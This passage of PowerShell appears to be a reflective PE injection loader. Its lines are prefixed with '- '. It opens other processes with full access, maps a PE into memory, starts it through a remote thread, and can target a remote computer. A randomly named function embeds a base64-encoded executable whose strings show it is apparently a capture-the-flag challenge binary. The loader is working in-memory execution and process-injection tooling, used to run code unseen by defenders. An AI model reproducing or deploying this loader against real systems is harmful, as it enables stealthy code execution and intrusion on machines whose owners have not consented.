- Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
- }
- $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
- if ($Success -eq $false)
- {
- Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
- }
- $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
- }
- }
- Write-Verbose "Calling dllmain so the DLL knows it is being unloaded"
- $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
- $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])
- $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)
- $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null
- $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
- if ($Success -eq $false)
- {
- Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
- }
- }
- Function Main
- {
- $Win32Functions = Get-Win32Functions
- $Win32Types = Get-Win32Types
- $Win32Constants = Get-Win32Constants
- $RemoteProcHandle = [IntPtr]::Zero
- if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
- {
- Throw "Can't supply a ProcId and ProcName, choose one or the other"
- }
- elseif ($ProcName -ne $null -and $ProcName -ne "")
- {
- $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
- if ($Processes.Count -eq 0)
- {
- Throw "Can't find process $ProcName"
- }
- elseif ($Processes.Count -gt 1)
- {
- $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
- Write-Output $ProcInfo
- Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
- }
- else
- {
- $ProcId = $Processes[0].ID
- }
- }
- if (($ProcId -ne $null) -and ($ProcId -ne 0))
- {
- $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
- if ($RemoteProcHandle -eq [IntPtr]::Zero)
- {
- Throw "Couldn't obtain the handle for process ID: $ProcId"
- }
- Write-Verbose "Got the handle for the remote process to inject in to"
- }
- Write-Verbose "Calling Invoke-MemoryLoadLibrary"
- $PEHandle = [IntPtr]::Zero
- if ($RemoteProcHandle -eq [IntPtr]::Zero)
- {
- $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR
- }
- else
- {
- $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR
- }
- if ($PELoadedInfo -eq [IntPtr]::Zero)
- {
- Throw "Unable to load PE, handle returned is NULL"
- }
- $PEHandle = $PELoadedInfo[0]
- $RemotePEHandle = $PELoadedInfo[1]
- $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
- if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
- {
- switch ($FuncReturnType)
- {
- 'WString' {
- Write-Verbose "Calling function with WString return type"
- [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "WStringFunc"
- if ($WStringFuncAddr -eq [IntPtr]::Zero)
- {
- Throw "Couldn't find function address."
- }
- $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])
- $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
- [IntPtr]$OutputPtr = $WStringFunc.Invoke()
- $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
- Write-Output $Output
- }
- 'String' {
- Write-Verbose "Calling function with String return type"
- [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "StringFunc"
- if ($StringFuncAddr -eq [IntPtr]::Zero)
- {
- Throw "Couldn't find function address."
- }
- $StringFuncDelegate = Get-DelegateType @() ([IntPtr])
- $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)
- [IntPtr]$OutputPtr = $StringFunc.Invoke()
- $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)
- Write-Output $Output
- }
- 'Void' {
- Write-Verbose "Calling function with Void return type"
- [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
- if ($VoidFuncAddr -eq [IntPtr]::Zero)
- {
- }
- else
- {
- $VoidFuncDelegate = Get-DelegateType @() ([Void])
- $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)
- $VoidFunc.Invoke() | Out-Null
- }
- }
- }
- }
- elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
- {
- $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
- if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
- {
- }
- else{
- $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
- $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
- $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
- }
- }
- if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq "DLL")
- {
- }
- else
- {
- }
- Write-Verbose "Done!"
- }
- Main
- }
- Function Main
- {
- if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
- {
- $DebugPreference = "Continue"
- }
- Write-Verbose "PowerShell ProcessID: $PID"
- $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join ''
- if ($e_magic -ne 'MZ')
- {
- throw 'PE is not a valid PE file.'
- }
- if (-not $DoNotZeroMZ) {
- $PEBytes[0] = 0
- $PEBytes[1] = 0
- }
- if ($ExeArgs -ne $null -and $ExeArgs -ne '')
- {
- $ExeArgs = "ReflectiveExe $ExeArgs"
- }
- else
- {
- $ExeArgs = "ReflectiveExe"
- }
- if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
- {
- Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)
- }
- else
- {
- Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName
- }
- }
- Main
- }
- function Invoke-HGFXNPCQTZ
- {
- $PEBytes32 = "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